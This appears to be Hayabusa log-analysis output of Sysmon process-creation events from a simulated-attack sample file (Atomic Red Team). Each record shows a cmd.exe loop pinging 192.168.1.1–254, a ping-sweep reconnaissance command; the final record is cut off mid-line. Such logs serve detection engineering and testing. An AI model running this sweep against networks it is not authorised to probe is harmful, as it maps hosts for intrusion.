2019-07-19 23:51:43.036 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.17 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6172 | PGUID: 747F3D96-D8FF-5D31-0000-00100E1A3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:43.503 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.18 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4316 | PGUID: 747F3D96-D8FF-5D31-0000-0010C5203400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:44.030 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.19 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6084 | PGUID: 747F3D96-D900-5D31-0000-0010B0233400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:44.507 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.20 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2416 | PGUID: 747F3D96-D900-5D31-0000-00109C263400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:45.011 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.21 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4104 | PGUID: 747F3D96-D901-5D31-0000-001086293400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:45.501 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.22 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5112 | PGUID: 747F3D96-D901-5D31-0000-0010712C3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:46.007 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.23 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1104 | PGUID: 747F3D96-D902-5D31-0000-00105B2F3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:46.500 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.24 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4700 | PGUID: 747F3D96-D902-5D31-0000-0010B2393400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:47.022 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.25 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6104 | PGUID: 747F3D96-D903-5D31-0000-00109D3C3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:47.546 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.26 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3216 | PGUID: 747F3D96-D903-5D31-0000-0010873F3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:48.044 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.27 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1492 | PGUID: 747F3D96-D904-5D31-0000-001084423400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:48.507 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.28 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1316 | PGUID: 747F3D96-D904-5D31-0000-00106E453400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:49.010 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.29 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5640 | PGUID: 747F3D96-D905-5D31-0000-001058483400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:49.550 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.30 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2928 | PGUID: 747F3D96-D905-5D31-0000-0010554B3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:50.021 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.31 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1952 | PGUID: 747F3D96-D906-5D31-0000-00103F4E3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:50.507 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.32 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3760 | PGUID: 747F3D96-D906-5D31-0000-001029513400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:51.013 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.33 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1992 | PGUID: 747F3D96-D907-5D31-0000-001013543400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:51.520 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.34 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4788 | PGUID: 747F3D96-D907-5D31-0000-0010DA5C3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:52.008 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.35 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3212 | PGUID: 747F3D96-D908-5D31-0000-0010C45F3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:52.448 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.36 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2552 | PGUID: 747F3D96-D908-5D31-0000-0010B2623400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:53.019 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.37 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2932 | PGUID: 747F3D96-D909-5D31-0000-00109E653400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:53.546 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.38 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6616 | PGUID: 747F3D96-D909-5D31-0000-001088683400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:54.036 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.39 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4312 | PGUID: 747F3D96-D90A-5D31-0000-0010726B3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:54.581 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.40 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3684 | PGUID: 747F3D96-D90A-5D31-0000-00105C6E3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:55.015 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.41 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 796 | PGUID: 747F3D96-D90B-5D31-0000-001046713400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:55.552 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.42 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5000 | PGUID: 747F3D96-D90B-5D31-0000-001031743400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:56.049 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.43 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4660 | PGUID: 747F3D96-D90C-5D31-0000-00102E773400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:56.534 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.44 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1360 | PGUID: 747F3D96-D90C-5D31-0000-0010F37F3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:57.034 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.45 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5060 | PGUID: 747F3D96-D90D-5D31-0000-0010DD823400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:57.558 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.46 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4708 | PGUID: 747F3D96-D90D-5D31-0000-0010D6853400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:58.020 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.47 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4624 | PGUID: 747F3D96-D90E-5D31-0000-0010D4883400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:58.457 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.48 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 7032 | PGUID: 747F3D96-D90E-5D31-0000-0010C18B3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:59.001 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.49 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3560 | PGUID: 747F3D96-D90E-5D31-0000-0010B58E3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:59.537 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.50 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5224 | PGUID: 747F3D96-D90F-5D31-0000-00109F913400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:00.063 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.51 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4380 | PGUID: 747F3D96-D910-5D31-0000-001050953400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:00.515 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.52 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4544 | PGUID: 747F3D96-D910-5D31-0000-00108F983400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:00.940 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.53 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4260 | PGUID: 747F3D96-D910-5D31-0000-0010BFA43400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:01.546 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.54 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3872 | PGUID: 747F3D96-D911-5D31-0000-001087AD3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:02.018 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.55 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1256 | PGUID: 747F3D96-D912-5D31-0000-001072B03400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:02.565 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.56 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5656 | PGUID: 747F3D96-D912-5D31-0000-00105CB33400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:03.059 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.57 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4792 | PGUID: 747F3D96-D913-5D31-0000-00105AB63400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:03.520 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.58 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5676 | PGUID: 747F3D96-D913-5D31-0000-001044B93400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:04.024 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: 
ping -n 1 -w 100 192.168.1.59 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5968 | PGUID: 747F3D96-D914-5D31-0000-001030BC3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:04.522 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.60 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 7156 | PGUID: 747F3D96-D914-5D31-0000-00102DBF3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:05.036 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.61 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4172 | PGUID: 747F3D96-D915-5D31-0000-001017C23400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:05.516 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.62 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1628 | PGUID: 
